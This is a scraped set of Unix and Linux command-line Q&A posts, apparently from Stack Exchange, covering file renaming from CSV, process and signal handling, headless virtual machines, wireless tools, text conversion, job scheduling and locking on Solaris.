'/(navLabel|docTitle)\/text/ {print $2}'
Extract TOC of epub file
1,575,483,815,000
I have used the info from another question on Stack Exchange to allow me to rename files using the info in a csv file. This line allows me to rename all files from the names in column 1, to the names in column 2. while IFS=, read -r -a arr; do mv "${arr[@]}"; done <$spreadsheet However, it attempts to compare the info in the top row. I would like to be able to include some code which allows me to skip rows. It would also be nice to gain a better understanding of how the above line of code works. I would have thought it would include some info about columns (ie. A and B)
Try this: tail -n +2 $spreadsheet | while IFS=, read -r -a arr; do mv "${arr[@]}"; done The tail command prints only the last lines of a file. With the "-n +2", it prints all the last lines of the file starting at the second. More on the while loop. The while loops runs the mv command as long as there are new lines available. It does that by using the condition of the while loop: IFS=, read -r -a arr What the above does is read one line into an array named arr, where the fields separator (IFS) is a comma. The -r option likely is not needed. Then, when running the mv command, "${arr[@]}" is converted to the list of fields where each field is separated by double quotes. In your case, there are only two fields per line, so its expanded just to the two fields. The "${arr[@]}" is a special convention used by bash for Arrays, as explained in the manual: Any element of an array may be referenced using ${name[subscript]}. The braces are required to avoid conflicts with pathname expansion. If subscript is @ or *, the word expands to all members of name. These subscripts differ only when the word appears within double quotes. If the word is double-quoted, ${name[*]} expands to a single word with the value of each array member separated by the first character of the IFS special variable, and ${name[@]} expands each element of name to a sepa- rate word. When there are no array members, ${name[@]} expands to nothing. If the double-quoted expansion occurs within a word, the expansion of the first parameter is joined with the beginning part of the original word, and the expansion of the last parameter is joined with the last part of the original word. This is analo- gous to the expansion of the special parameters * and @ (see Special Parameters above). ${#name[subscript]} expands to the length of ${name[subscript]}. If sub- script is * or @, the expansion is the number of elements in the array. Referenc- ing an array variable without a subscript is equivalent to referencing element zero.
Skip first line (or more) in CSV file which is used to rename files
1,575,483,815,000
Is it possible, using grep, find, etc, to sort a list of directories by the last modified date of the same-named file (e.g., file.php) within? For example: domain1/file.php (last modified 20-Jan-2014 00:00) domain2/file.php (last modified 22-Jan-2014 00:00) domain3/file.php (last modified 24-Jan-2014 00:00) domain4/file.php (last modified 23-Jan-2014 00:00) Each directory has the same file name (e.g., file.php). The result should be: domain3/ (last modified 24-Jan-2014 00:00) domain4/ (last modified 23-Jan-2014 00:00) domain2/ (last modified 22-Jan-2014 00:00) domain1/ (last modified 21-Jan-2014 00:00)
As Vivian suggested, the -t option of ls tells it to sort files by modification time (most recent first, by default; reversed if you add -r).  This is most commonly used (at least in my experience) to sort the files in a directory, but it can also be applied to a list of files on the command line.  And wildcards (“globs”) produce a list of files on the command line.  So, if you say ls -t */file.php it will list domain3/file.php domain4/file.php domain2/file.php domain1/file.php But, it you add the -1 (dash one) option, or pipe this into anything, it will list them one per line.  So the command you want is ls -t */file.php | sed 's|/file.php||' This is an ordinary s/old_string/replacement_string/ substitution in sed, but using | as the delimiter, because the old_string contains a /, and with an empty replacement_string.  (I.e., it deletes the filename and the / before it — /file.php — from the ls output.)  Of course, if you want the trailing / on the directory names, just do sed 's|file.php||' or sed 's/file.php//'. If you want, add the -l (lower-case L) option to ls to get the long listing, including modification date/time.  And then you may want to enhance the sed command to strip out irrelevant information (like the mode, owner, and size of the file) and, if you want, move the date/time after the directory name. This will look into the directories that are in the current directory, and only them.  (This seems to be what the question is asking for.)  Doing a one-level scan of some other directory is a trivial variation: ls -t /path/to/tld/*/file.php | sed 's|/file.php||' To (recursively) search the entire directory tree under your current directory (or some other top-level directory) is a little trickier.  Type the command shopt -s globstar and then replace the asterisk (*) in one of the above commands with two asterisks (**), e.g., ls -t **/file.php | sed 's|/file.php||'
Sorting directories by last modified date/time of the same-named contained file
1,575,483,815,000
I am trying to get a list of wireless networks nearby while the adapter is acting as an access point but iwlist returns the following error: $ sudo iwlist wlan0 scan wlan0 Interface doesn't support scanning : Operation not supported Is there another way of getting this list, perhaps with another utility? My Tomato powered WRT54 seems to be able to achieve this (listing nearby APs while the device itself is set up as an AP), so I'm curious how I could replicate that behaviour. Thanks.
iwlist is seriously deprecated. Remove it from your system and never use it again. Do the same with iwconfig, iwspy. Those tools are ancient and were designed in an era where 802.11n didn't exist. Kernel developers maintain a ugly compatibility layer to still support wireless-tools, and this compatibility layer often lies. Now install iw if not already done. The iw command you are looking for is iw dev wlan0 scan ap-force. This is a fairly recent addition. Not all drivers support this, but most should do.
Getting a list of WiFi networks nearby when the adapter is in AP mode
1,575,483,815,000
Are there any terminal-based (ie. non-GUI) virtual-computer programs out there? I've been using programs like VirtualBox and QEMU, but they're obviously GUI-based... I was hoping for a virtual PC program where I can do everything - create a new virtual machine, create it's disk, install OS (assuming a text-based installer is available) and start the VM on a terminal (thus replacing the host's shell with the VM's boot-message, log-in prompt and shell) - from a virtual-terminal/xterm-window/ssh/screen-session, instead of in a window under X. The reason I ask, is that I often use ssh at work to connect to my home-computer, and the network is too slow for X or VNC. Still I'd like to tinker with VMs...
In qemu/kvm, you only get a GUI if you attach a video card to your VM and if you don't expose it as SPICE/VNC. For instance, you can do (zsh syntax, with grub2): grub-mkimage -O i386-pc -c =(print -l serial 'terminal_input serial' \ 'terminal_output serial' ) -o grub.img configfile biosdisk part_msdos part_gpt ext2 \ linux test serial halt minicmd cat And start your VM with: kvm -kernel grub.img -hda yourdisk.img -nographic From the grub prompt, load the kernel from the disk passing console=ttyS0... option or equivalent on the system you're booting to have the console on serial. Remember to add a getty on the serial line as well. Assuming you're running Linux in the VM, you can then update its grub config to display on serial and boot a kernel with serial console, and then you can boot your image disk directly without that grub.img. To access the qemu "monitor", type Ctrl-Ac (where you can add/remove devices...). You can have the serial port as a unix domain or TCP socket, instead of stdio if you like as well. Same for the qemu "monitor" interface. Now, provided you have the sgabios.bin firmware, and that your VM doesn't use graphics (just VGA BIOS text output), you can also just use the -curses option: kvm -hda yourdisk -curses The VGA console is then shown in your terminal. If you need to access the qemu monitor, press Alt-2.
Terminal-based (non GUI) virtual-computer program?
1,575,483,815,000
I am trying to have a confirmation message every time I type exit command in the command-prompt. To do this, I have tried to use trap in .bashrc file but it seem like trap is not a solution as it run the original command anyway. Is there a way I can have this? Here is my bashrc script code which could not get the job done: function _exit() # Function to run upon exit of shell. { read -p "${RED}Are you sure? " REPLY if [[ $REPLY =~ ^[Yy]$ ]]; then echo -e "${RED}Bye${NC}" exit 0 else #I do not know what to do here to not exit return fi } trap _exit EXIT
If the shell is zsh or bash (though not in sh mode), make exit a function. Functions have precedence over shell builtins (even special ones like exit) in zsh or bash (though not in POSIX shells). So just rename your function to exit and use command exit within the function instead. Otherwise you had endless recursion, of course.
Confirm before exit the command-prompt
1,575,483,815,000
I noticed this problem when I became confused with pipe, one command send its executing output to the STDOUT, which is the STDIN for the other command, which can read from STDIN. How do I know if a Linux command can read from STDIN? Is there a feature to distinguish commands that can read from STDIN from those cannot?
(In response to the upvotes on my comment) There isn't a concrete way of determining if an application reads from STDIN or something else. In general, you'll have to try piping something to it or reading the program's man page.
How to know if a Linux command can read from STDIN?
1,575,483,815,000
Is there a simple way for me to add a shell command to a list of jobs to have run on the system when I'm not logged in? For example: I SSH into my system, decide that I want to read an ebook later, but it's in the wrong format. I'll use Calibre to convert it, but this will take up the CPU for many minutes. I'm in no rush though, so I would like to tell my system to start the Calibre convert operation (just running a shell command) as soon as I log out of my SSH session. Then later when I SSH in again, my converted book will be waiting for me.
A simple, but possibly inconvenient method is to start the command with nohup to detach it from the terminal, just before logging out. nohup mycommand & logout Any output from the command is sent to the file nohup.out in the current directory. It is usually more convenient to run the command inside screen or tmux. Both programs provide a terminal within a terminal, and you can detach your session from the current terminal and reattach to it later. screen # inside the screen session sleep 60; mycommand # press Ctrl+A D to detach from the session # now back in the original shell logout Then later: screen -rd # inside the screen session, you can see how your command is doing … exit Another possibility is to schedule the job for later. The at command lets you schedule a job at a specific time (it's the once-off pendant of cron for regularly scheduled tasks). If the command produces output, it'll be mailed to you (assuming you have local mail running). echo 'mycommand' | at 23:05
GNU: Delayed jobs Queue
1,575,483,815,000
Is there a command that relaunch the application once it finishes from the command line? Letting you do something like: > relaunch python myapp.py If not, then what's my best option? I know I could cron it, but I'd be more interested in something I could just execute from the terminal and that restarts at once. I'm on Debian if that matters.
You can try with a simple infinite loop: while true; do python myapp.py done Edit: the above is just a simple generic example. Most probably modifications are needed to take into account exit errors etc. For example: until `python myapp.py; echo $?`; do echo "exit ok, restarting" done
Relaunch application once finished
1,575,483,815,000
I'm looking for some tool that can convert text, ideally from UTF-8 (but ISO-8859-2 and WINDOWS-1250 would be fine) into ASCII/ISO-8859-1? I have seen some online transliteration tools but I need something for the command line (and iconv is refusing to convert the file).
By default, iconv refuses to convert the file if it contains characters that do not exist in the target character set. Use //TRANSLIT to “downgrade” such characters. iconv -f utf-8 -t iso8859-1//TRANSLIT
Converting text into ASCII/ISO-8859-1
1,575,483,815,000
I have a runaway ruby process - I know exactly how I trigger it. Point is, it got me thinking about runaway processes (CPU usage or memory usage). How would one monitor runaway processes with cron? grep / top / ulimit? Can one notify the user via the command line if something like this happens? What alternatives are there to Monit?
Instead of writing a script yourself you could use the verynice utility. Its main focus is on dynamic process renicing but it also has the option to kill runaway processes and is easily configured.
cronjob to watch for runaway processes and kill them
1,575,483,815,000
I'm sometimes working on the command line (or in the Ranger file manager), and it's annoying to have to move to a graphical interface to double-click on a AppImage. It looks like Ranger tries xdg-open; I tried that on the command line, myself, and that fails. My permissions are correct, so how can I actually run an AppImage from the command line?
Making it executable chmod +x file and running it with ./file worked for me.
How to run AppImage on the command line
1,575,483,815,000
I'm using the following line in my scripts: ssh -f -N -M -S <control socket> <host> This means the initial connection just stays in the background and I can use it for subsequent calls to ssh: ssh -S <control socket> <host> <command> However, if I have multiple scripts with commands which are supposed to use the same control socket and put the "background" call to ssh into all of them, I will get the following message at some point: ControlSocket <control socket> already exists, disabling multiplexing This has no influence over the rest of the script because obviously the socket exists and can be used by the subsequent ssh commands. However, even though the "background" session couldn't open the socket, it doesn't quit and stays active - just without multiplexing. Using [ -S or ssh -O check to check the existence of the socket would still leave the possibility of race conditions. How can I do "open control socket if it doesn't exist yet, and exit if it does"?
I think you are looking for ControlMaster auto, which can be either specified in configuration file or directly on command-line with -o ControlMaster=auto. This allows you to unify the commands opening the connection and using it (also very helpful with ControlPersist).
How to abort if ssh control socket already exists?
1,575,483,815,000
I've seen lots of places people have suggested to store command line arguments, ~/.config/google-chrome-flags.conf ~/.config/chromium-flags.conf /etc/default, My version of chromium doesn't seem to be using these, and none of these locations are mentioned in man chromium-browser. Where would I best store a command line flag that I want to be supplied to chromium-browser?
I found joy in, /etc/chromium-browser/default Which is set by the CHROMIUM_FLAGS options. CHROMIUM_FLAGS="--incognito --password-store=gnome"
Where can I configure Chromium's default command line arguments?
1,575,483,815,000
I'd like to separate record by first word (eg DEBUG or INFO) and keep RS. but execute program, awk removes RS. How to keep it? log.txt is DEBUG:[2018-04-09 13:00:01] ========================= START LOG : : END LOG =========================== DEBUG:[2018-04-09 13:00:02] INFO:[2018-04-09 13:00:03] DEBUG:[2018-04-09 13:00:04] ========================= START LOG : : END LOG =========================== my trying program is $gawk 'BEGIN{RS="(DEBUG|INFO)"; FS="\n"}{print RS$0}' log.txt but it shows (DEBUG|INFO):[2018-04-09 13:00:01] ========================= START LOG : : END LOG =========================== (DEBUG|INFO):[2018-04-09 13:00:02] (DEBUG|INFO):[2018-04-09 13:00:03] (DEBUG|INFO):[2018-04-09 13:00:04] ========================= START LOG : : END LOG ===========================
You can use RT gawk 'BEGIN{RS="(DEBUG|INFO)"; FS="\n"}{printf "%s%s", $0, RT}' log.txt
Is it possible to keep record separator in awk?
1,515,164,174,000
I have a python program that I run it via command line (Mac OSX) as: python -W ignore Experiment.py --iterations 10 The file Experiment.py should be run multiple times using different --iterations values. I do that manually one after another, so when one run is finished, I run the second one with different --iterations, and so on. However, I cannot always set near to my laptop to run all of them so I am wondering if there is a way using shell script where I can state all runs together and then the shell script executes them one after another (Not parallel, just sequentially as I would have done it by my self)? Something like: python -W ignore Experiment.py --iterations 10 python -W ignore Experiment.py --iterations 100 python -W ignore Experiment.py --iterations 1000 python -W ignore Experiment.py --iterations 10000 python -W ignore Experiment.py --iterations 100000 Edit: What if I have multiple arguments --X --Y --Z?
You can use a for loop: for iteration in 10 100 1000 10000 100000; do python -W ignore Experiment.py --iteration "${iteration}" done If you have multiple parameters, and you want all the various permutations of all parameters, as @Fox noted in a comment below, you can use nested loops. Suppose, for example, you had a --name parameter whose values could be n1, n2, and n3, then you could do: for iteration in 10 100 1000 10000 100000; do for name in n1 n2 n3; do python -W -ignore Experiment.py --iteration "${iteration}" --name "${name}" done done You could put that in a file, for example runExperiment.sh and include this as the first line: #!/bin/bash. You could then run the script using either: bash runExperimen.sh Or, you could make the script executable, then run it: chmod +x runExperiment.sh ./runExperiment.sh If you're interested in some results before others, that'll guide how you structure the loops. In my example above, the script will run: ... --iteration 10 --name n1 ... --iteration 10 --name n2 ... --iteration 10 --name n3 ... --iteration 100 --name n1 So it runs all experiments for iteration 10 before moving on to the next iteration. If instead you wanted all experiments for name n1 before moving on to the next, you could make the name loop the "outer" loop. for name in ...; do for iteration in ...; do
Running a program with several parameters using shell script
1,515,164,174,000
How can I create a virtual machine from the CLI? Creating a Virtual Machine First, download an ISO cd image of some OS you want to run. For Ubuntu, you can find these at: http://www.ubuntu.com/getubuntu/download Double click on the name of the host. The Status column should read Active Right click on the name of the host, and select New This will start a wizard to guide you through the rest of your VM creation Enter your virtual machine details Name: foo Choose Local install media (ISO image or CDROM), or you can use another method if you know what you're doing Forward Locate your install media Use ISO image Browse to find the ISO you downloaded earlier Optional: Select the matching OS Type Optional: Select the matching Version Forward Primarily just for my own edification.
Just use: virt-install \ --name vm_name \ --ram=2048 \ --vcpus=2 \ --disk pool=guest_images,size=30,bus=virtio,format=qcow2 \ --cdrom /var/iso/debian.iso \ --network bridge=kvmbr0,model=virtio \ --graphics vnc,listen=0.0.0.0,password=Qwerty1234 \ --boot cdrom,hd,menu=on Where /var/iso/debian.iso - path to iso image guest_images - disk pool, you need to create it before vm
create a virtual machine from the CLI? (KVM)
1,515,164,174,000
I connect with the following command: sudo wpa_supplicant -B -D nl80211 -i wlan_card -c /etc/wpa_supplicant/connection.conf It connects fine, and keeps persistent connection. If AP goes down, the connection tears, if AP gets back up, the connection comes back. If I power down the wifi interface: sudo ip link set wlan_card down It goes down. When I bring it up with: sudo ip link set wlan_card up The connection, that was launched in the very beginning with wpa_supplicant, reconnects again. Such stable, persistent connection is very good, but then it causes a problem, if I want to connect to a different AP. When I try to use wpa_cli with any command, it just gives me the following error: Failed to connect to non-global ctrl_ifname: (nil) error: No such file or directory When I try to disconnect with: sudo iw dev wlan_card disconnect It disconnects, but reconnects right away, so, currently, I have to reserve to: ps -AlF|grep -i wpa sudo kill -KILL wpa_pid I wish to know the correct method to stop the connection, or killing is the only way?
Before connecting a to a different AP you can stop the running instance of the wpa_supplicant service: sudo killall wpa_supplicant Configure your /etc/wpa_supplicant/connection.conf then connect through wpa_supplicant.
How to disconnect wifi link, that was connected with wpa_supplicant
1,515,164,174,000
I am setting up an Arch/Manjaro-based machine that only occasionally will be connected to network. I.e. most of the time its Ethernet card is disconnected. I run into this curious problem - when I try to use networking commands the interface is down (I sit next to it with my laptop that has a Wi-Fi Internet connection). So I am not sure if it is working properly. How do I set up the network without an Ethernet connection present so that when I finally plug in a cable I can be sure that the address will be 192.168.1.1? I found the answer: use SkipNoCarrier=yes in the netctl profile. It is in Manjaro StaticIP wiki and in Arch netctl page.
Like this for example: For a static IP configuration copy the /etc/netctl/examples/ethernet-static example profile to /etc/netctl and modify Interface, Address, Gateway and DNS) as needed. For example: /etc/netctl/my_static_profile Interface=enp1s0 Connection=ethernet IP=static Address=('10.1.10.2/24') Gateway=('10.1.10.1') DNS=('10.1.10.1') Link to the official Arch Wiki here. This of course only works if you don't use Network Manager or something similar to control your network.
How do I set a static IP address for a disconnected interface?
1,515,164,174,000
I have my VMs on a dedicated computer, over SSH I use vboxheadless to start them, and then I use remote desktop to use them. Now, while a VM is running, it is trivial to insert the "GuestAdditions" image into the guest's optical drive and install them. To do that with an attached GUI, it's at Devices > Insert Guest Additions CD Image. However, I'm not using the GUI because I'm using the guest OS via remote desktop, so I obviously don't have the menus, either. I'd like to know how to perform this function from command line. I'd imagine it's using vboxmanage to insert and remove that CD image from the virtual guest machine's drive. Also, is there a way how to insert any other CD images and/or floppy images into the virtual drives of a guest system - and remove them - while the guest OS is running?
The way I do this is: Get the VboxAdditions UUID [fredmj@Lagrange ~]$ vboxmanage list dvds [...] UUID: 3cc8e4fb-e56e-blabla... State: created Type: readonly Location: /usr/share/virtualbox/VBoxGuestAdditions.iso Storage format: RAW Capacity: 55 MBytes Encryption: disabled Use vboxmanage storageattach with the correct UUID to grab the UUID and put it in the vboxmanage command: [fredmj@Lagrange ~]$ vboxmanage storageattach CENTOS7.GUESTADD --storagectl SATA --port 1 --type dvddrive --medium 3cc8e4fb-e56e-blabla.. Reading the User Manual, I thought it was possible to use something like --medium additions, but I didn't figure how.
How to "insert" guest additions image in VirtualBox from command line, while VM is running?
1,515,164,174,000
I'm not sure what's going on but I've been trying to understand what is happening with the input and output. So here is my program. #include <stdio.h> #include <stdlib.h> int main(){ char pass[8]; fgets(pass, 8, stdin); if (pass[1] == 'h'){ printf("enter shell\n"); system("/bin/bash"); printf("leave shell\n"); } return 0; } And here are some terminal commands. When I run it regularly, and input 'hh', the shell stays opened. idkanything ~ $ ./a.out hh enter shell bash-3.2$ Now I try to echo then pipe, but the shell closes immediately. idkanything ~ $ echo "hh" | ./a.out enter shell leave shell So now here is when it works: idkanything ~ $ cat <(python -c 'print "hh"') - | ./a.out enter shell this work /bin/bash: line 1: this: command not found leave shell But when I leave out the '-' for stdin, it does not work as in the shell closes immediately. idkanything ~ $ cat <(python -c 'print "hh"') | ./a.out enter shell leave shell When I have cat at the end here, it also works. idkanything ~ $ (python -c 'print "hh"'; cat) | ./a.out enter shell this works /bin/bash: line 1: this: command not found leave shell Can someone please explain what's going on? What specifically about the commands that work makes the shell stay open? Why does the shell only stay open for these commands and not for the other commands like echoing "hh" and then piping that in. I believe it may have something to do with stdout.
For the cases where it "works", you are leaving a process running cat which is reading its standard input, which has not been closed. Since that is not (yet) closed, cat continues to run, leaving its standard output open, which is used by the shell (also not closed).
cat into stdin then pipe into program keeps forked shell open, why?
1,515,164,174,000
I have an alias in .bashrc like this: alias ylog = "yarn logs -applicationId" This works well when I do ylog application_123. Sometimes, my job names come in the form of job_123 instead of application_123 and in order to get ylog I need to manually replace the text "job" by "application" in my command line. Is it possible to improve the alias so that the following happens: ylog job_123 resolves to ylog application_123 ylog application_123 resolves to ylog application_123
Bash does not allow parameters in aliases, so you need to define and use a function, e.g.: ylog() { yarn logs -applicationId "${1/#job_/application_}" }
Improve existing alias to dynamically replace command line text
1,515,164,174,000
I noticed there is a difference between outputs of free command: On debian: $ free -h total used free shared buffers cached Mem: 4.0G 3.4G 629M 0B 96K 1.3G -/+ buffers/cache: 2.1G 2.0G Swap: 4.0G 1.1G 2.9G On gentoo: $ free -h total used free shared buff/cache available Mem: 15G 3.7G 9.6G 485M 2.2G 11G Swap: 8.8G 2.6G 6.2G Redhat (at least 7.x) seems to have same output as gentoo. Why is that? Is it possible to display debian style output on gentoo / redhat systems as well? Are both distros using different gnu coreutils?
free is provided by procps-ng; Debian 8 has version 3.3.9, which uses the old style with a separate line for buffers/cache, while Gentoo and presumably RHEL 7.x have version 3.3.10 or later which uses the new style. You can see the reasoning behind the change in the corresponding commit message. If you really want the old-style output you can run an older version of procps, but you'll find that distributions will migrate to the newer style by default. The newer style also gives the amount of available memory which is a really useful piece of information (see How can I get the amount of available memory portably across distributions? for details). Somewhat confusingly, version 3.3.9 refers to the format without the buffers/cache line as "old format", and you can see it in that version with free -o. So all told: versions 3.3.9 and earlier show by default total used free shared buffers cached Mem: 31G 30G 539M 1.1G 2.2G 15G -/+ buffers/cache: 13G 18G Swap: 31G 180M 31G versions 3.3.9 and earlier, with -o, show total used free shared buffers cached Mem: 31G 30G 549M 1.1G 2.2G 15G Swap: 31G 180M 31G versions 3.3.10 and later only show total used free shared buff/cache available Mem: 31G 7.8G 525M 1.1G 23G 22G Swap: 31G 180M 31G versions 3.3.10 and later also have a wide output mode, -w, which shows total used free shared buffers cache available Mem: 31G 7.8G 531M 1.1G 2.2G 20G 22G Swap: 31G 180M 31G (This is all on the same system; note how the accounting is more accurate with the later versions.)
free command output: gentoo (redhat?) vs debian
1,515,164,174,000
I'm having a String which is seperated by commas like a,b,c,d,e,f that I want to split into an array with the comma as seperator. Then I want to print each element on a new line. The problem I'm having is that all cli tools I know so far(sed, awk, grep) only work on lines, but how do I get a string into a format that can be used by these tools. What i'v tried so far is echo "a,b,c,d,e,f" | awk -F', ' '{print $i"\n"}' How can I get this output a b c d e f from this input a,b,c,d,e,f ?
Sticking with your awk ... just make sure you understand the difference between a field and a record separator :} echo "a,b,c,d,e,f" | awk 'BEGIN{RS=","}{$1=$1}1' But the tr solution in the comments is preferable.
Split string into array and print each element on a new line with commandline
1,515,164,174,000
Is it possible to run a single shortened command that would in turn initiate multiple longer to type commands? for instance, $ kontact & rekonq when passed to my terminal opens two applications. Could I create a command of my own, to include this action and shorten the time it takes to perform it?
I think what you're looking for is a shell script. A shell script basically lets you turn anything you can type into the shell into a command. So, for example, to run those two programs from a shell, you'd run: $ kontact & $ rekonq & To put those in a shell script, open a new file in a text editor, and put in the following lines: #!/bin/bash kontact & rekonq & You'll note that's very similar to what you typed in the shell—the only difference is that #!/bin/bash line up top (which the site has helpfully rendered in a different color for us). That line tells the system that this is a script that should be executed by bash. Finally, after saving the file, you need to make it executable with chmod +x file-name. Now, hypothetically, if you saved that as /home/your-username/bin/run-my-programs you could just type ~/bin/run-my-programs into your shell, at both of those programs should start up. Note that many distros have login scripts that will add a bin directory in your $HOME to your command search path automatically, so that is a great place to put shell scripts that you'd like to easily run. They will only do this, though, if $HOME/bin exists when you log in. Then you could leave out the path and just type run-my-programs. Obviously, you need to be careful naming your scripts so they don't conflict with other programs on your systems—it'd be confusing and surprising had you named that ls, for example! The above shell script isn't really that useful. It's more useful when your programs are more complicated. For example, this is a real script I use at work: #!/bin/sh xterm -geometry 80x24+0+0 -T 'Bennu-DBA' -e ssh bennu -t 'screen -d -R -S status' & xterm -geometry 80x24+0+342 -e screen -S 'bservers' -c ~/.screenrc-bservers & xterm -geometry 80x9+0+684 -T 'df-graph' -xrm '.xterm.vt100.allowTitleOps: no' & ( cd ~/src/haruhi.metrics.net/operations/backup/bennu && xterm -geometry 80x24+0+827 -T 'Bennu-Conf' ) & ( cd ~/src/haruhi.metrics.net/operations/backup/phoenix && xterm -geometry 80x24+509+827 -T 'Bennu-Conf' ) & xterm -geometry 177x77+509+0 -T 'Console' -e screen -c ~/.screenrc-bconsole & That saves a bunch of work manually placing and resizing windows (all those -geometry options). And all the -e options start up appropriate programs in them.
is it possible to create a macro-like user defined shell command?
1,515,164,174,000
I have a strange behavior on my system. When I invoke a command in the shell (bash version 4.2.45(1)-release), say top or cat, the running program (the process) does not respond to Ctrl+C. I even tried to run kill -2 <pid> and kill -15 <pid>, but it didn't help. However, I can kill processes with SIGKILL. I own the process, I even tried to send a signal to the process (signals 2 and 15) as root but it did not respond. I can quit top if I press q. Any ideas about the problem? Or any hint to troubleshoot it? UPDATE 1 cat and top were just examples. All processes have the same behavior. I tried to write a simple program to sleep only (without signal handler) and I had the same behavior. UPDATE 2 I wrote a small program to sleep only. This time I installed signal handler to catch SIGTERM and SIGINT. When I invoked kill -15 <pid> (and so with -2), my program did not receive the signal! I also updated the kernel to 3.11.10-100.fc18.i686 and still having the same problem.
Recent versions of the nVidia proprietary drivers (possibly combined with other recent versions of libraries) have a bug which causes them to corrupt the signal mask. You can look at signal masks like this: anthony@Zia:~$ ps -eo blocked,pid,cmd | egrep -v '^0+ ' BLOCKED PID CMD fffffffe7ffbfeff 605 udevd --daemon 0000000000000002 4052 /usr/lib/policykit-1/polkitd --no-debug 0000000000087007 4646 /usr/sbin/mysqld --basedir=/usr […] 0000000000010000 15508 bash That's about what it should look like. If you run that on a system with the proprietary nVidia drivers, you'll see all kinds of crazy values for BLOCKED, for many of your programs—including, likely, all the misbehaving ones. Note that signal masks are passed from parent to child through fork/exec, so once a parent process has a corrupt one, all the children it spawns from that point forward will, too. See also my question After upgrade, X button in titlebar no longer closes xterm and various distro bugs you'll be able to find now, knowing which package to look at. You can modify the code in my answer to that question to reset the signal mask to none blocked (Elide sigaddset and change SIG_UNBLOCK to SIG_SETMASK).
Processes do not respond to my signals
1,515,164,174,000
I have a custom $PS1 variable that looks like this on my command line: And on emacs using M-x shell unfortunately looks like this: Here is my $PS1 variable export PS1='\[\e]0;\u@\h: \w\a\]\[\e[0;36m\]\T \[\e[1;30m\]\[\e[0;34m\]\u@\H\[\e[1;30m\] \[\e[0;32m\]\[\e[1;37m\]\w\[\e[0;37m\] \$ ' How can I make emacs shell-mode look the same with my CLI variable?
Leave the set title part to the terminals that support it: case $TERM in (xterm*) set_title='\[\e]0;\u@\h: \w\a\]';; (*) set_title= esac PS1=$set_title'\[\e[0;36m\]\T \[\e[1;30m\]\[\e[0;34m\]\u@\H\[\e[1;30m\] \[\e[0;32m\]\[\e[1;37m\]\w\[\e[0;37m\] \$ '
Emacs shell mode makes $PS1 different
1,515,164,174,000
When I play music on vlc or cvlc in terminal or console there is always this (shown below) non-stopping output that prevents me from issuing commands by pressing ENTER key. I want to disable it, I tried to start vlc with vlc -q switch in quite mode but it only gets rid of [ ] bracket parts, the rest still remains and continues to grow. So, how to make vlc completely not to show this information and still be able to execute command-line commands like next, play, random etc? VLC media player 2.0.7 Twoflower (revision 2.0.6-54-g7dd7e4d) [0x255e418] dummy interface: using the dummy interface module... libdvdnav: Using dvdnav version 4.2.0 libdvdread: Encrypted DVD support unavailable. libdvdread: Attempting to use device /dev/sdb1 mounted on /run/media/easl/freyja for CSS authentication libdvdread: Could not open input: Permission denied libdvdread: Can't open /dev/sdb1 for reading libdvdread: Device /dev/sdb1 inaccessible, CSS authentication not available. libdvdnav:DVDOpenFilePath:findDVDFile /VIDEO_TS/VIDEO_TS.IFO failed libdvdnav:DVDOpenFilePath:findDVDFile /VIDEO_TS/VIDEO_TS.BUP failed libdvdread: Can't open file VIDEO_TS.IFO. libdvdnav: vm: failed to read VIDEO_TS.IFO [0x24966b8] main playlist: stopping playback TagLib: MPEG::Header::parse() -- Invalid sample rate. TagLib: ID3v2.4 no longer supports the frame type TDAT. It will be discarded from the tag. TagLib: MPEG::Header::parse() -- Invalid sample rate. TagLib: MPEG::Header::parse() -- Invalid sample rate. TagLib: ID3v2.4 no longer supports the frame type TDAT. It will be discarded from the tag. TagLib: MPEG::Header::parse() -- Invalid sample rate.
You should be able to get rid of the output of the libraries by piping stderr away cvlc -q mymedia 2> /dev/null As for the commands, I'm not sure vlc accepts commands from plain stdin, but it sounds like the rc interface might be what you're looking for. cvlc -q -Irc mymedia 2> /dev/null
How to disable VLC output in command-line mode?
1,515,164,174,000
I would like to find a command-line or a script that will show me if HTML5 player is running or not in a browser (firefox or chromium). For example, to determine if Flash player is running in a browser, I use next command: pgrep -lfc ".*((c|C)hrome|chromium|firefox|).*flashp.*"
I don't see how this would be feasible given HTML5 support is typically built into the browser directly, whereas, Adobe Flash is a plugin. You can see what is a plugin in Chrome by browsing to the "chrome:plugins" page. For example you can see the Adobe Plugin from my Chrome browser.            HTML5 on the other hand doesn't have any corresponding plugin, so you won't see a process getting forked from Chrome when it's dealing with this type of content.
How can I determine if HTML5 player is running in browser?
1,515,164,174,000
From time to time I need to dig through huge log files (several GB unpacked) to debug a specific error. Now, vim is OK for browsing through the file, but when I need to find something in the file it's completely useless. Is there some tool that could index the log and allow me to search the file faster? Ideally a command line tool. EDIT: Just to clarify, tools like ack or grep aren't suitable since I need to examine the context of the matches and -C,-A,-B just aren't good enough. Plus ack and grep are still unusably slow.
There are really good log indexers that are a bit bigger than command line tool level. Commercially, splunk is the big one and hard to beat. Graylog2 is a nice open source implementation. Elasticsearch+Logstash are quite good too. There is a fair bit of overhead to both setting them up to collect and running the collection server but once you have central log collection as a part of your system, they're great. Querying and reporting logs from multiple sources is the biggest benefit for multi tiered apps. As for command line, if you can plug your logging into syslog, the systemd journald implementation allows for indexing on a number of fields as items are logged. Not sure if that would be useful in text processing though, more for the metadata. Not sure about any ad hoc command line tools, they would still have an extract/load/parse time penalty each time you load the file. That being said, less does most of what I need in a single log file. &pattern grep pattern /pattern search forward ?pattern search backward shift-f tail -f the tail mode can take the previous pattern into consideration as well which is great for watching live logs
Digging through huge gziped log files
1,515,164,174,000
I have in the past heard of using nail for this task, but I can't seem to find it for my distribution (Ubuntu 11.04) in any of the repositories. What program can I use to one-off emails from a shell like so: send-mail -to [email protected] -file attachment.zip -message "Hello World" Is there a program out there through which I can script mail sending as above?
nail was renamed to Heirloom mailx. For Ubuntu, you want to install the heirloom-mailx package, and then read the Sending mail from scripts section of the manpage.
How can I automate sending mail using a script?
1,515,164,174,000
On Linux I use flock lock command to execute a command with an exclusive lock. What is the standard operating system command of Solaris 10 to do the same in a shell?
After a small Usenet discussion I use the following as a workaround for flock -n lockfile -c command: #! /bin/bash if [ $# != 4 -o "$1" = '-h' ] ; then echo "Usage: flock -n lockfile -c command" >&2 exit 1 fi lockfile=$2 command=$4 set -o noclobber if 2>/dev/null : > "$lockfile" ; then trap 'rm -f "$lockfile"' EXIT $BASH -c "$command" else exit 1 fi
How to lock on Solaris 10?
1,515,164,174,000
